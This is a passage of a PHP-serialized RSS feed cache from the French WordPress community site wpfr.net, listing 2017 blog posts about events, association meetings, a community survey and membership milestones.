WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/POlUtKLV2DI/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wpfr.net/gen5-evenement-numerique-wordpress/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 05 Sep 2017 11:59:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"Evènements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1860285\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1488:\"La 5e édition de Grand-Est Numérique ou #GEN5 aura lieu les 21 et 22 septembre 2017 au Centre Foire et Congrès de Metz. Cet évènement réservé aux professionnels du numérique nous propose un programme de conférences, tables rondes et autres ateliers participatifs. Deux sessions autour de WordPress vous seront proposées par votre humble serviteur. WPFR<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=POlUtKLV2DI:D5WhSR95RJY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=POlUtKLV2DI:D5WhSR95RJY:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=POlUtKLV2DI:D5WhSR95RJY:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=POlUtKLV2DI:D5WhSR95RJY:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=POlUtKLV2DI:D5WhSR95RJY:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=POlUtKLV2DI:D5WhSR95RJY:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/POlUtKLV2DI\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wpfr.net/gen5-evenement-numerique-wordpress/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wpfr.net/gen5-evenement-numerique-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"BlendWebMix 2017 : WPFR est partenaire !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/WzJcLpFnZ7Q/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wpfr.net/blendwebmix-2017-wpfr-partenaire/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 16 Aug 2017 10:00:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"Evènements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1780344\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1513:\"Le BlendWebMix 2017 aura lieu les 26 et 27 octobre 2017 à Lyon. Pour l&#8217;occasion, WPFR vous propose une billetterie communautaire pour vous faire profiter de tarifs avantageux. Le BlendWebMix est un évènement Web similaire aux WordCamps organisés par la communauté WordPress. Elle rassemble des orateurs talentueux aux multiples compétences Web qui vous feront partager leurs<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=WzJcLpFnZ7Q:LaqrXUsOGtI:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=WzJcLpFnZ7Q:LaqrXUsOGtI:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=WzJcLpFnZ7Q:LaqrXUsOGtI:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=WzJcLpFnZ7Q:LaqrXUsOGtI:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=WzJcLpFnZ7Q:LaqrXUsOGtI:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=WzJcLpFnZ7Q:LaqrXUsOGtI:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/WzJcLpFnZ7Q\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wpfr.net/blendwebmix-2017-wpfr-partenaire/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wpfr.net/blendwebmix-2017-wpfr-partenaire/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"Compte rendu de la réunion du 10 juillet 2017\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/HOXhXbdFR7A/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 03 Aug 2017 06:22:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"Association\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1689645\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1481:\"Présents : Xavier Borderie, Benoît Catherineau et Aurélien Denis L’ordre du jour Les finances Actions en cours et à venir Questions diverses Aurélien Denis, Président, ouvre la séance en rappelant que l&#8217;association compte à ce jour 225 membres à jour de leur cotisation. Il passe la parole à Xavier pour parler des finances. Les finances<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=HOXhXbdFR7A:_7ilDV_EV8s:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=HOXhXbdFR7A:_7ilDV_EV8s:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=HOXhXbdFR7A:_7ilDV_EV8s:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=HOXhXbdFR7A:_7ilDV_EV8s:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=HOXhXbdFR7A:_7ilDV_EV8s:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=HOXhXbdFR7A:_7ilDV_EV8s:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/HOXhXbdFR7A\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Benoît Catherineau\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wpfr.net/compte-rendu-reunion-10-juillet-2017/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"Les résultats du grand sondage de la communauté francophone de WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/_z7qQytCHB8/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"https://wpfr.net/resultats-grand-sondage-de-communaute-francophone-de-wordpress/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Jul 2017 12:52:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:7:\"Brèves\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:21:\"WordPress Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:11:\"communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:7:\"sondage\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1647338\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1513:\"Fin mai, un grand sondage était lancé par Maxime Bernard-Jacquet au nom de la communauté francophone de WordPress afin de mieux identifier comment elle se composait ! Aujourd&#8217;hui les résultats sont disponibles. La première statistique intéressante est la participation, puisque ce sont 1000 personnes qui ont répondues à ce questionnaire. Ceci permet donc d&#8217;avoir des<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=_z7qQytCHB8:88mzRUJSvF0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=_z7qQytCHB8:88mzRUJSvF0:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=_z7qQytCHB8:88mzRUJSvF0:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=_z7qQytCHB8:88mzRUJSvF0:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=_z7qQytCHB8:88mzRUJSvF0:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=_z7qQytCHB8:88mzRUJSvF0:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/_z7qQytCHB8\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Benoît Catherineau\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://wpfr.net/resultats-grand-sondage-de-communaute-francophone-de-wordpress/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"https://wpfr.net/resultats-grand-sondage-de-communaute-francophone-de-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"Cap des 200 adhérents WPFR franchi !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/dZ9emWhTWPc/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wpfr.net/cap-200-adherents-wpfr-franchi/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 13 Jun 2017 15:16:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1642124\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1476:\"C&#8217;est officiel, l&#8217;association WordPress Francophone compte 200 membres à jour de cotisation ! Ouvertes depuis septembre 2016, les adhésions en ligne remportent un vif succès et nous sommes heureux de voir que la communauté WordPress se porte bien. On se donne rendez-vous à Paris pour le WordCamp Europe du 16 et 17 juin prochain. Le<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=dZ9emWhTWPc:XRx8AZKI2zs:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=dZ9emWhTWPc:XRx8AZKI2zs:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=dZ9emWhTWPc:XRx8AZKI2zs:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=dZ9emWhTWPc:XRx8AZKI2zs:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=dZ9emWhTWPc:XRx8AZKI2zs:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=dZ9emWhTWPc:XRx8AZKI2zs:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/dZ9emWhTWPc\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wpfr.net/cap-200-adherents-wpfr-franchi/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wpfr.net/cap-200-adherents-wpfr-franchi/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Annonce de la prochaine Assemblée Générale du 12/12\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/g8Lqzfsj1e0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wpfr.net/annonce-prochaine-assemblee-generale-12-12/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 04 Dec 2017 19:28:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association 